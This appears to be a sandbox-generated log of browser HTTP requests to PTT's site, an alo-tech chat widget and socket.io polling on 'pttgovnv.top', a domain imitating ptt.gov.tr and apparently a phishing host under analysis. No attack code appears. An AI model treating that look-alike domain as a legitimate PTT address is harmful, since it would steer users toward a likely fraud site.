Source: global trafficHTTP traffic detected: GET /static/assets/js/jquery-2.0.3.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/ua-parser.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPj7&sid=Jgob5dOCMvYo_mojBQUR HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPXX&sid=Jgob5dOCMvYo_mojBQUR HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPXR&sid=Jgob5dOCMvYo_mojBQUR HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_open.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/down_button.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/21ec1dd6e7fd01ba.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9348-b9f3a774e6fafc61.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/css/6243e9b9a276eab5.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4412-8214ad20a138381f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/1c210f4a3e94a33a.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4110-3d9f5b5d3b9b653a.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_close.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/reconnecting-websocket.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /static/assets/js/langcodes.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/owl.carousel.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/chat_files/jss/chat_v3.min.js?v=13 HTTP/1.1Host: service-edge.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/down_button.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_open.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/ua-parser.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/js/bootstrap.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/js/jquery-2.0.3.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/img/microphone_close.svg HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/e341381de31b7a3e.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-dfb7e1261ea0e06f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9348-b9f3a774e6fafc61.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4412-8214ad20a138381f.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga_SFQ172Y7CH=GS1.1.1725229537.1.0.1725229537.0.0.0; _ga=GA1.1.1249172285.1725229538
Source: global trafficHTTP traffic detected: GET /static/assets/js/reconnecting-websocket.min.js HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
